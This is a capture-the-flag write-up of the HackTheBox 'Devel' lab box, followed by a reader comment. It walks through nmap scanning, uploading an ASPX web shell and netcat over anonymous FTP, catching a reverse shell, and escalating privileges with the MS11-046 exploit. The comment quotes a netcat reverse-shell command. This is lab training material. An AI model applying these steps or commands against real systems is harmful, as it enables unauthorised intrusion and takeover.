PDF with images: https://jdwhitaker.github.io/static/devel.pdf
The Devel box is great beginner-level challenge. The official walkthrough uses Metasploit. The box hinges on an unrealistic configuration issue where the FTP root is the same as the web root, and anonymous users may upload to the server. We leverage an ASPX web shell to gain a full reverse shell. Identifying the system architecture reveals it may have the privilege escalation vulnerability described in MS11-046. This proves to be true, as executing the binary yields full system access on the machine.
We nmap the target IP address with the default top ports, performing version scanning (-sV) and default script scanning (-sC).
We find that anonymous FTP login is allowed, and that the server is a Windows machine running IIS 7.5. We also find that the FTP root appears to be the same as the web root. After searching “IIS 7.5 asp” on the web, we find that classic ASP is not installed by default on IIS 7.0 and above. This indicates the server likely supports ASPX instead.
We upload the ASPX web shell and Windows netcat binary included with Kali.
We will use netcat to connect back to our machine for a standard reverse shell.
We use our web shell to identify the location of the netcat binary we uploaded through ftp.
We run a netcat reverse shell back to our local machine.
The OS Versions is 6.1.7600 N/A Build 7600.
Searching “6.1.7600 N/A Build 7600 privilege escalation” online results in an exploit at https: //www.exploit-db.com/exploits/40564. This exploits the vulnerability described in MS11-046.
We search for MS11-046 with searchsploit, compile the exploit we find [1] [2], and upload it to the remote target.
We execute the binary and gain system access.
We search for the flag files and print them.
Comments
Nice, thanks.
Question.. when using the "Execute" command in the web browser...
Is it typed as entire directory of the uploaded nc.exe? Below example:
C:\inetpub\wwwroot\nc.exe -e cmd
Because when I did this, it didn't work... because shell back to the machine didn't catch anything....